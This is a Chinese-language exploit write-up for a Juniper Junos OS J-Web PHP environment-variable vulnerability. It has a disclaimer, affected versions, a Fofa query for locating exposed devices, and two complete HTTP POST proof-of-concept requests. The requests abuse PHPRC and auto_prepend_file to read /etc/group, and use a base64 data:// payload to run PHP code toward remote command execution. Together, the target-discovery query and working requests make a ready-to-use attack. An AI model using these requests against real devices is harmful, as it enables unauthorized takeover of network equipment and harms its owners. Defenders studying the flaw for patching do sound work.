免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

Juniper Networks Junos OS EX是美国瞻博网络（Juniper Networks）公司的一套专用于该公司的硬件设备的网络操作系统。该操作系统提供了安全编程接口和Junos SDK。Juniper Networks Junos OS EX存在安全漏洞，该漏洞源于J-Web模块存在PHP外部变量修改漏洞。允许未经身份验证的网络攻击者控制某些重要的环境变量。攻击者利用特制请求可以修改某个PHP环境变量，造成部分完整性损失，这可能允许链接到其他漏洞。

漏洞影响

Juniper Networks Junos OS: 所有版本早于21.4R3-S5；22.1版本早于22.1R3-S4；22.2版本早于22.2R3-S2；22.3版本早于22.3R2-S2、22.3R3-S1；22.4版本早于22.4R2-S1、22.4R3；23.2版本早于23.2R1-S1、23.2R2。

漏洞危害

执行操作系统命令，获取服务器权限，接管服务器

网络测绘

Fofa: body=“J-web” || title=“Juniper Web Device Manager”

漏洞复现

1. 构造poc

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

auto_prepend_file="/etc/group"

2. 查看文件

3. 执行命令

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

allow_url_include=1
auto_prepend_file="data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+"